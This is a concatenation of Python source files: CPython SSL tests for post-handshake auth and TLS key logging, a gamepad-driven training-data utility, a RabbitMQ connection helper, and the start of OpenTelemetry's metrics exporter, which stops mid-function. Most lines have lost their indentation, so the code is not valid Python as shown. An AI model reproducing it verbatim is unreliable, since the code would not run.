server_hostname=hostname,
suppress_ragged_eofs=False) as s:
s.connect((HOST, server.port))
s.write(b'PHA')
                # The test sometimes fails with an EOF error. It passes as
                # long as the server aborts the connection with an error.
with self.assertRaisesRegex(
ssl.SSLError,
'(certificate required|EOF occurred)'
):
# receive CertificateRequest
data = s.recv(1024)
self.assertEqual(data, b'OK\n')
# send empty Certificate + Finish
s.write(b'HASCERT')
# receive alert
s.recv(1024)
def test_pha_optional(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# check CERT_OPTIONAL
server_context.verify_mode = ssl.CERT_OPTIONAL
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_optional_nocert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_OPTIONAL
client_context.post_handshake_auth = True
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
                # CERT_OPTIONAL does not fail when the client has no cert
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
def test_pha_no_pha_client(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with self.assertRaisesRegex(ssl.SSLError, 'not server'):
s.verify_client_post_handshake()
s.write(b'PHA')
self.assertIn(b'extension not received', s.recv(1024))
def test_pha_no_pha_server(self):
# server doesn't have PHA enabled, cert is requested in handshake
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA doesn't fail if there is already a cert
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_not_tls13(self):
# TLS 1.2
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# PHA fails for TLS != 1.3
s.write(b'PHA')
self.assertIn(b'WRONG_SSL_VERSION', s.recv(1024))
def test_bpo37428_pha_cert_none(self):
# verify that post_handshake_auth does not implicitly enable cert
# validation.
hostname = SIGNED_CERTFILE_HOSTNAME
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# no cert validation and CA on client side
client_context.check_hostname = False
client_context.verify_mode = ssl.CERT_NONE
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
server_context.load_verify_locations(SIGNING_CA)
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# server cert has not been validated
self.assertEqual(s.getpeercert(), {})
def test_internal_chain_client(self):
client_context, server_context, hostname = testing_context(
server_chain=False
)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname
) as s:
s.connect((HOST, server.port))
vc = s._sslobj.get_verified_chain()
self.assertEqual(len(vc), 2)
ee, ca = vc
uvc = s._sslobj.get_unverified_chain()
self.assertEqual(len(uvc), 1)
self.assertEqual(ee, uvc[0])
self.assertEqual(hash(ee), hash(uvc[0]))
self.assertEqual(repr(ee), repr(uvc[0]))
self.assertNotEqual(ee, ca)
self.assertNotEqual(hash(ee), hash(ca))
self.assertNotEqual(repr(ee), repr(ca))
self.assertNotEqual(ee.get_info(), ca.get_info())
self.assertIn("CN=localhost", repr(ee))
self.assertIn("CN=our-ca-server", repr(ca))
pem = ee.public_bytes(_ssl.ENCODING_PEM)
der = ee.public_bytes(_ssl.ENCODING_DER)
self.assertIsInstance(pem, str)
self.assertIn("-----BEGIN CERTIFICATE-----", pem)
self.assertIsInstance(der, bytes)
self.assertEqual(
ssl.PEM_cert_to_DER_cert(pem), der
)
def test_internal_chain_server(self):
client_context, server_context, hostname = testing_context()
client_context.load_cert_chain(SIGNED_CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname
) as s:
s.connect((HOST, server.port))
s.write(b'VERIFIEDCHAIN\n')
res = s.recv(1024)
self.assertEqual(res, b'\x02\n')
s.write(b'UNVERIFIEDCHAIN\n')
res = s.recv(1024)
self.assertEqual(res, b'\x02\n')
HAS_KEYLOG = hasattr(ssl.SSLContext, 'keylog_filename')
requires_keylog = unittest.skipUnless(
HAS_KEYLOG, 'test requires OpenSSL 1.1.1 with keylog callback')
class TestSSLDebug(unittest.TestCase):
def keylog_lines(self, fname=os_helper.TESTFN):
with open(fname) as f:
return len(list(f))
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_defaults(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
self.assertFalse(os.path.isfile(os_helper.TESTFN))
ctx.keylog_filename = os_helper.TESTFN
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
self.assertTrue(os.path.isfile(os_helper.TESTFN))
self.assertEqual(self.keylog_lines(), 1)
ctx.keylog_filename = None
self.assertEqual(ctx.keylog_filename, None)
with self.assertRaises((IsADirectoryError, PermissionError)):
# Windows raises PermissionError
ctx.keylog_filename = os.path.dirname(
os.path.abspath(os_helper.TESTFN))
with self.assertRaises(TypeError):
ctx.keylog_filename = 1
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_filename(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
client_context, server_context, hostname = testing_context()
client_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# header, 5 lines for TLS 1.3
self.assertEqual(self.keylog_lines(), 6)
client_context.keylog_filename = None
server_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 11)
client_context.keylog_filename = os_helper.TESTFN
server_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 21)
client_context.keylog_filename = None
server_context.keylog_filename = None
@requires_keylog
@unittest.skipIf(sys.flags.ignore_environment,
"test is not compatible with ignore_environment")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_env(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with unittest.mock.patch.dict(os.environ):
os.environ['SSLKEYLOGFILE'] = os_helper.TESTFN
self.assertEqual(os.environ['SSLKEYLOGFILE'], os_helper.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
ctx = ssl.create_default_context()
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
def test_msg_callback(self):
client_context, server_context, hostname = testing_context()
def msg_cb(conn, direction, version, content_type, msg_type, data):
pass
self.assertIs(client_context._msg_callback, None)
client_context._msg_callback = msg_cb
self.assertIs(client_context._msg_callback, msg_cb)
with self.assertRaises(TypeError):
client_context._msg_callback = object()
def test_msg_callback_tls12(self):
client_context, server_context, hostname = testing_context()
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
msg = []
def msg_cb(conn, direction, version, content_type, msg_type, data):
self.assertIsInstance(conn, ssl.SSLSocket)
self.assertIsInstance(data, bytes)
self.assertIn(direction, {'read', 'write'})
msg.append((direction, version, content_type, msg_type))
client_context._msg_callback = msg_cb
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn(
("read", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.SERVER_KEY_EXCHANGE),
msg
)
self.assertIn(
("write", TLSVersion.TLSv1_2, _TLSContentType.CHANGE_CIPHER_SPEC,
_TLSMessageType.CHANGE_CIPHER_SPEC),
msg
)
def test_msg_callback_deadlock_bpo43577(self):
client_context, server_context, hostname = testing_context()
server_context2 = testing_context()[1]
def msg_cb(conn, direction, version, content_type, msg_type, data):
pass
def sni_cb(sock, servername, ctx):
sock.context = server_context2
server_context._msg_callback = msg_cb
server_context.sni_callback = sni_cb
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
class TestEnumerations(unittest.TestCase):
def test_tlsversion(self):
class CheckedTLSVersion(enum.IntEnum):
MINIMUM_SUPPORTED = _ssl.PROTO_MINIMUM_SUPPORTED
SSLv3 = _ssl.PROTO_SSLv3
TLSv1 = _ssl.PROTO_TLSv1
TLSv1_1 = _ssl.PROTO_TLSv1_1
TLSv1_2 = _ssl.PROTO_TLSv1_2
TLSv1_3 = _ssl.PROTO_TLSv1_3
MAXIMUM_SUPPORTED = _ssl.PROTO_MAXIMUM_SUPPORTED
enum._test_simple_enum(CheckedTLSVersion, TLSVersion)
def test_tlscontenttype(self):
class Checked_TLSContentType(enum.IntEnum):
"""Content types (record layer)
See RFC 8446, section B.1
"""
CHANGE_CIPHER_SPEC = 20
ALERT = 21
HANDSHAKE = 22
APPLICATION_DATA = 23
# pseudo content types
HEADER = 0x100
INNER_CONTENT_TYPE = 0x101
enum._test_simple_enum(Checked_TLSContentType, _TLSContentType)
def test_tlsalerttype(self):
class Checked_TLSAlertType(enum.IntEnum):
"""Alert types for TLSContentType.ALERT messages
See RFC 8446, section B.2
"""
CLOSE_NOTIFY = 0
UNEXPECTED_MESSAGE = 10
BAD_RECORD_MAC = 20
DECRYPTION_FAILED = 21
RECORD_OVERFLOW = 22
DECOMPRESSION_FAILURE = 30
HANDSHAKE_FAILURE = 40
NO_CERTIFICATE = 41
BAD_CERTIFICATE = 42
UNSUPPORTED_CERTIFICATE = 43
CERTIFICATE_REVOKED = 44
CERTIFICATE_EXPIRED = 45
CERTIFICATE_UNKNOWN = 46
ILLEGAL_PARAMETER = 47
UNKNOWN_CA = 48
ACCESS_DENIED = 49
DECODE_ERROR = 50
DECRYPT_ERROR = 51
EXPORT_RESTRICTION = 60
PROTOCOL_VERSION = 70
INSUFFICIENT_SECURITY = 71
INTERNAL_ERROR = 80
INAPPROPRIATE_FALLBACK = 86
USER_CANCELED = 90
NO_RENEGOTIATION = 100
MISSING_EXTENSION = 109
UNSUPPORTED_EXTENSION = 110
CERTIFICATE_UNOBTAINABLE = 111
UNRECOGNIZED_NAME = 112
BAD_CERTIFICATE_STATUS_RESPONSE = 113
BAD_CERTIFICATE_HASH_VALUE = 114
UNKNOWN_PSK_IDENTITY = 115
CERTIFICATE_REQUIRED = 116
NO_APPLICATION_PROTOCOL = 120
enum._test_simple_enum(Checked_TLSAlertType, _TLSAlertType)
def test_tlsmessagetype(self):
class Checked_TLSMessageType(enum.IntEnum):
"""Message types (handshake protocol)
See RFC 8446, section B.3
"""
HELLO_REQUEST = 0
CLIENT_HELLO = 1
SERVER_HELLO = 2
HELLO_VERIFY_REQUEST = 3
NEWSESSION_TICKET = 4
END_OF_EARLY_DATA = 5
HELLO_RETRY_REQUEST = 6
ENCRYPTED_EXTENSIONS = 8
CERTIFICATE = 11
SERVER_KEY_EXCHANGE = 12
CERTIFICATE_REQUEST = 13
SERVER_DONE = 14
CERTIFICATE_VERIFY = 15
CLIENT_KEY_EXCHANGE = 16
FINISHED = 20
CERTIFICATE_URL = 21
CERTIFICATE_STATUS = 22
SUPPLEMENTAL_DATA = 23
KEY_UPDATE = 24
NEXT_PROTO = 67
MESSAGE_HASH = 254
CHANGE_CIPHER_SPEC = 0x0101
enum._test_simple_enum(Checked_TLSMessageType, _TLSMessageType)
def test_sslmethod(self):
Checked_SSLMethod = enum._old_convert_(
enum.IntEnum, '_SSLMethod', 'ssl',
lambda name: name.startswith('PROTOCOL_') and name != 'PROTOCOL_SSLv23',
source=ssl._ssl,
)
enum._test_simple_enum(Checked_SSLMethod, ssl._SSLMethod)
def test_options(self):
CheckedOptions = enum._old_convert_(
enum.IntFlag, 'Options', 'ssl',
lambda name: name.startswith('OP_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedOptions, ssl.Options)
def test_alertdescription(self):
CheckedAlertDescription = enum._old_convert_(
enum.IntEnum, 'AlertDescription', 'ssl',
lambda name: name.startswith('ALERT_DESCRIPTION_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedAlertDescription, ssl.AlertDescription)
def test_sslerrornumber(self):
Checked_SSLErrorNumber = enum._old_convert_(
enum.IntEnum, 'SSLErrorNumber', 'ssl',
lambda name: name.startswith('SSL_ERROR_'),
source=ssl._ssl,
)
enum._test_simple_enum(Checked_SSLErrorNumber, ssl.SSLErrorNumber)
def test_verifyflags(self):
CheckedVerifyFlags = enum._old_convert_(
enum.IntFlag, 'VerifyFlags', 'ssl',
lambda name: name.startswith('VERIFY_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedVerifyFlags, ssl.VerifyFlags)
def test_verifymode(self):
CheckedVerifyMode = enum._old_convert_(
enum.IntEnum, 'VerifyMode', 'ssl',
lambda name: name.startswith('CERT_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedVerifyMode, ssl.VerifyMode)
def test_main(verbose=False):
if support.verbose:
plats = {
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SSLObjectTests, SimpleBackgroundTests, ThreadedTests,
TestPostHandshakeAuth, TestSSLDebug
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
thread_info = threading_helper.threading_setup()
try:
support.run_unittest(*tests)
finally:
threading_helper.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
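# Illustrative sketch (not part of the test suite above): the minimal server-side
# calls that the TestPostHandshakeAuth cases exercise. The certificate paths, the
# pre-accepted socket `conn`, and the exact I/O pattern are assumptions; only the
# ssl-module calls mirror what the tests do.
def _pha_server_sketch(certfile, cafile, conn):
    context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    context.load_cert_chain(certfile)
    context.load_verify_locations(cafile)
    context.post_handshake_auth = True   # allow requesting a client cert after the handshake
    context.verify_mode = ssl.CERT_REQUIRED
    with context.wrap_socket(conn, server_side=True) as ssock:
        # TLS 1.3 only: queue a CertificateRequest for the already-connected client;
        # it is flushed and the client's reply is processed during subsequent I/O.
        ssock.verify_client_post_handshake()
        ssock.send(b'OK\n')
        ssock.recv(1024)
        return ssock.getpeercert()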
|
utils.py
|
#!/usr/bin/env python
import sys
import array
import numpy as np
from skimage.color import rgb2gray
from skimage.transform import resize
from skimage.io import imread
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from tqdm import tqdm
from inputs import get_gamepad
import math
import threading
def resize_image(img):
im = resize(img, (Sample.IMG_H, Sample.IMG_W, Sample.IMG_D))
im_arr = im.reshape((Sample.IMG_H, Sample.IMG_W, Sample.IMG_D))
return im_arr
class Screenshot(object):
SRC_W = 850
SRC_H = 530
SRC_D = 3
OFFSET_X = 200
OFFSET_Y = 50
class Sample:
IMG_W = 250
IMG_H = 166
IMG_D = 3
class XboxController(object):
MAX_TRIG_VAL = math.pow(2, 8)
MAX_JOY_VAL = math.pow(2, 15)
def __init__(self):
self.LeftJoystickY = 0
self.LeftJoystickX = 0
self.RightJoystickY = 0
self.RightJoystickX = 0
self.LeftTrigger = 0
self.RightTrigger = 0
self.LeftBumper = 0
self.RightBumper = 0
self.A = 0
self.X = 0
self.Y = 0
self.B = 0
self.LeftThumb = 0
self.RightThumb = 0
self.Back = 0
self.Start = 0
self.LeftDPad = 0
self.RightDPad = 0
self.UpDPad = 0
self.DownDPad = 0
self._monitor_thread = threading.Thread(target=self._monitor_controller, args=())
self._monitor_thread.daemon = True
self._monitor_thread.start()
def read(self):
x = self.LeftJoystickX
y = self.LeftJoystickY
a = self.A
b = self.B # b=1, x=2
rb = self.RightBumper
return [x, y, a, b, rb]
def _monitor_controller(self):
while True:
events = get_gamepad()
for event in events:
if event.code == 'ABS_Y':
self.LeftJoystickY = event.state / XboxController.MAX_JOY_VAL # normalize between -1 and 1
elif event.code == 'ABS_X':
self.LeftJoystickX = event.state / XboxController.MAX_JOY_VAL # normalize between -1 and 1
elif event.code == 'ABS_RY':
self.RightJoystickY = event.state / XboxController.MAX_JOY_VAL # normalize between -1 and 1
elif event.code == 'ABS_RX':
self.RightJoystickX = event.state / XboxController.MAX_JOY_VAL # normalize between -1 and 1
elif event.code == 'ABS_Z':
self.LeftTrigger = event.state / XboxController.MAX_TRIG_VAL # normalize between 0 and 1
elif event.code == 'ABS_RZ':
self.RightTrigger = event.state / XboxController.MAX_TRIG_VAL # normalize between 0 and 1
elif event.code == 'BTN_TL':
self.LeftBumper = event.state
elif event.code == 'BTN_TR':
self.RightBumper = event.state
elif event.code == 'BTN_EAST':
self.A = event.state
elif event.code == 'BTN_NORTH':
self.X = event.state
elif event.code == 'BTN_WEST':
self.Y = event.state
elif event.code == 'BTN_SOUTH':
self.B = event.state
elif event.code == 'BTN_THUMBL':
self.LeftThumb = event.state
elif event.code == 'BTN_THUMBR':
self.RightThumb = event.state
elif event.code == 'BTN_SELECT':
self.Back = event.state
elif event.code == 'BTN_START':
self.Start = event.state
elif event.code == 'BTN_TRIGGER_HAPPY1':
self.LeftDPad = event.state
elif event.code == 'BTN_TRIGGER_HAPPY2':
self.RightDPad = event.state
elif event.code == 'BTN_TRIGGER_HAPPY3':
self.UpDPad = event.state
elif event.code == 'BTN_TRIGGER_HAPPY4':
self.DownDPad = event.state
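# Illustrative polling sketch (assumes a gamepad is connected and visible to the
# `inputs` package; the dictionary keys are hypothetical labels, not part of the
# class above). read() is typically called once per captured frame.
def _poll_controller(pad=None):
    pad = pad or XboxController()
    x, y, a, b, rb = pad.read()
    return {'x': x, 'y': y, 'a': a, 'b': b, 'rb': rb}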
class Data(object):
def __init__(self):
self._X = np.load("data/X.npy")
self._y = np.load("data/y.npy")
self._epochs_completed = 0
self._index_in_epoch = 0
self._num_examples = self._X.shape[0]
@property
def num_examples(self):
return self._num_examples
def next_batch(self, batch_size):
start = self._index_in_epoch
self._index_in_epoch += batch_size
if self._index_in_epoch > self._num_examples:
# Finished epoch
self._epochs_completed += 1
# Start next epoch
start = 0
self._index_in_epoch = batch_size
assert batch_size <= self._num_examples
end = self._index_in_epoch
return self._X[start:end], self._y[start:end]
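# Minimal usage sketch for Data.next_batch (illustrative only; it assumes
# data/X.npy and data/y.npy already exist, as Data.__init__ requires).
def _demo_next_batch(batch_size=32, steps=10):
    data = Data()
    for step in range(steps):
        # When the running index passes the end of the arrays, next_batch
        # resets to the start of the data and counts another completed epoch.
        batch_x, batch_y = data.next_batch(batch_size)
        print(step, batch_x.shape, batch_y.shape)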
def load_sample(sample):
image_files = np.loadtxt(sample + '/data.csv', delimiter=',', dtype=str, usecols=(0,))
joystick_values = np.loadtxt(sample + '/data.csv', delimiter=',', usecols=(1,))
joystick_values_new = []
for jv in joystick_values:
joystick_values_new.append(jv*1.2)
return image_files, joystick_values_new
def load_imgs(sample):
image_files = np.loadtxt(sample + '/data.csv', delimiter=',', dtype=str, usecols=(0,))
return image_files
# training data viewer
def viewer(sample):
image_files, joystick_values = load_sample(sample)
plotData = []
plt.ion()
plt.figure('viewer', figsize=(16, 6))
for i in range(len(image_files)):
# joystick
print(i, " ", joystick_values[i,:])
# format data
plotData.append( joystick_values[i,:] )
if len(plotData) > 30:
plotData.pop(0)
x = np.asarray(plotData)
# image (every 3rd)
if (i % 3 == 0):
plt.subplot(121)
image_file = image_files[i]
img = mpimg.imread(image_file)
plt.imshow(img)
# plot
plt.subplot(122)
plt.plot(range(i,i+len(plotData)), x[:,0], 'r')
plt.plot(range(i,i+len(plotData)), x[:,1], 'b')
plt.plot(range(i,i+len(plotData)), x[:,2], 'g')
plt.plot(range(i,i+len(plotData)), x[:,3], 'k')
plt.plot(range(i,i+len(plotData)), x[:,4], 'y')
plt.draw()
plt.pause(0.0001) # seconds
i += 1
# prepare training data
def prepare(samples):
print("Preparing data")
num_samples = 0
for sample in samples:
image_files = load_imgs(sample)
num_samples += len(image_files)
print(f"There are {num_samples} samples")
X = []
y = []
for sample in samples:
print(sample)
# load sample
image_files, joystick_values = load_sample(sample)
joystick_values_generated = []
for i in tqdm(range(len(image_files))):
jv = joystick_values[i]
i = image_files[i]
image = imread(i)
vec = resize_image(image)
X.append(vec)
joystick_values_generated.append(jv)
y.append(joystick_values_generated)
print("Saving to file...")
X = np.asarray(X)
y = np.concatenate(y)
np.save("data/X", X)
np.save("data/y", y)
print("Done!")
return
if __name__ == '__main__':
if sys.argv[1] == 'viewer':
viewer(sys.argv[2])
elif sys.argv[1] == 'prepare':
prepare(sys.argv[2:])
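# Example invocations (sample directories are hypothetical):
#   python utils.py viewer samples/run_01
#   python utils.py prepare samples/run_01 samples/run_02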
|
Rabbit_Base.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017 In-Q-Tel, Inc, All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
''' Created on 21 August 2017
@author: dgrossman
'''
import pika
import threading
import time
from functools import partial
from .Logger_Base import Logger
module_logger = Logger
class Rabbit_Base(object): # pragma: no cover
'''
Base Class for RabbitMQ
'''
def __init__(self):
self.logger = module_logger.logger
def make_rabbit_connection(self, host, port, exchange, queue_name, keys,
total_sleep=float('inf')): # pragma: no cover
'''
Connects to rabbitmq using the given hostname,
exchange, and queue. Retries on failure until success.
Binds routing keys appropriate for module, and returns
the channel and connection.
'''
wait = True
do_rabbit = True
rabbit_channel = None
rabbit_connection = None
while wait and total_sleep > 0:
try:
rabbit_connection = pika.BlockingConnection(
pika.ConnectionParameters(host=host, port=port))
rabbit_channel = rabbit_connection.channel()
rabbit_channel.exchange_declare(exchange=exchange,
exchange_type='topic')
rabbit_channel.queue_declare(queue=queue_name, exclusive=True)
self.logger.debug('connected to {0} rabbitmq...'.format(host))
wait = False
except Exception as e:
self.logger.debug(
'waiting for connection to {0} rabbitmq...'.format(host))
self.logger.debug(str(e))
time.sleep(2)
total_sleep -= 2
wait = True
if wait:
do_rabbit = False
if isinstance(keys, list) and not wait:
for key in keys:
self.logger.debug(
'array adding key:{0} to rabbitmq channel'.format(key))
rabbit_channel.queue_bind(exchange=exchange,
queue=queue_name,
routing_key=key)
if isinstance(keys, str) and not wait:
self.logger.debug(
'string adding key:{0} to rabbitmq channel'.format(keys))
rabbit_channel.queue_bind(exchange=exchange,
queue=queue_name,
routing_key=keys)
return rabbit_channel, rabbit_connection, do_rabbit
def start_channel(self, channel, mycallback, queue, m_queue):
''' handle threading for messagetype '''
self.logger.debug('about to start channel {0}'.format(channel))
channel.basic_consume(partial(mycallback, q=m_queue), queue=queue,
no_ack=True)
mq_recv_thread = threading.Thread(target=channel.start_consuming)
mq_recv_thread.start()
return mq_recv_thread
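# Illustrative usage sketch (not part of the class): the exchange, queue name,
# routing key, and callback below are assumptions; only the Rabbit_Base calls
# and the pika consumer signature used by start_channel are taken from above.
def _example_consume(host='localhost', port=5672):
    import queue
    m_queue = queue.Queue()
    def my_callback(channel, method, properties, body, q=None):
        q.put(body)
    rabbit = Rabbit_Base()
    channel, connection, ok = rabbit.make_rabbit_connection(
        host, port, 'topic_exchange', 'my_queue', ['my.routing.key'], total_sleep=30)
    if ok:
        rabbit.start_channel(channel, my_callback, 'my_queue', m_queue)
        print(m_queue.get())  # block until the first message arrives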
|
__init__.py
|
# Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from abc import ABC, abstractmethod
from enum import Enum
from logging import getLogger
from os import environ, linesep
from sys import stdout
from threading import Event, RLock, Thread
from typing import IO, Callable, Dict, Iterable, List, Optional, Sequence
from typing_extensions import final
# This kind of import is needed to avoid Sphinx errors.
import opentelemetry.sdk._metrics._internal
from opentelemetry.context import (
_SUPPRESS_INSTRUMENTATION_KEY,
attach,
detach,
set_value,
)
from opentelemetry.sdk._metrics._internal.aggregation import (
AggregationTemporality,
DefaultAggregation,
)
from opentelemetry.sdk._metrics._internal.instrument import (
Counter,
Histogram,
ObservableCounter,
ObservableGauge,
ObservableUpDownCounter,
UpDownCounter,
)
from opentelemetry.sdk.environment_variables import (
_OTEL_EXPORTER_OTLP_METRICS_TEMPORALITY_PREFERENCE,
)
from opentelemetry.util._once import Once
from opentelemetry.util._time import _time_ns
_logger = getLogger(__name__)
class MetricExportResult(Enum):
"""Result of exporting a metric
Can be any of the following values:"""
SUCCESS = 0
FAILURE = 1
class MetricExporter(ABC):
"""Interface for exporting metrics.
Interface to be implemented by services that want to export metrics received
in their own format.
"""
@abstractmethod
def export(
self,
metrics: Sequence["opentelemetry.sdk._metrics.export.Metric"],
timeout_millis: float = 10_000,
**kwargs,
) -> MetricExportResult:
"""Exports a batch of telemetry data.
Args:
metrics: The list of `opentelemetry.sdk._metrics.export.Metric` objects to be exported
Returns:
The result of the export
"""
@abstractmethod
def shutdown(self, timeout_millis: float = 30_000, **kwargs) -> None:
"""Shuts down the exporter.
Called when the SDK is shut down.
"""
class ConsoleMetricExporter(MetricExporter):
"""Implementation of :class:`MetricExporter` that prints metrics to the
console.
This class can be used for diagnostic purposes. It prints the exported
metrics to the console STDOUT.
"""
def __init__(
self,
out: IO = stdout,
formatter: Callable[
["opentelemetry.sdk._metrics.export.Metric"], str
] = lambda metric: metric.to_json()
+ linesep,
):
self.out = out
self.formatter = formatter
def export(
self,
metrics: Sequence["opentelemetry.sdk._metrics.export.Metric"],
timeout_millis: float = 10_000,
**kwargs,
) -> MetricExportResult:
for metric in metrics:
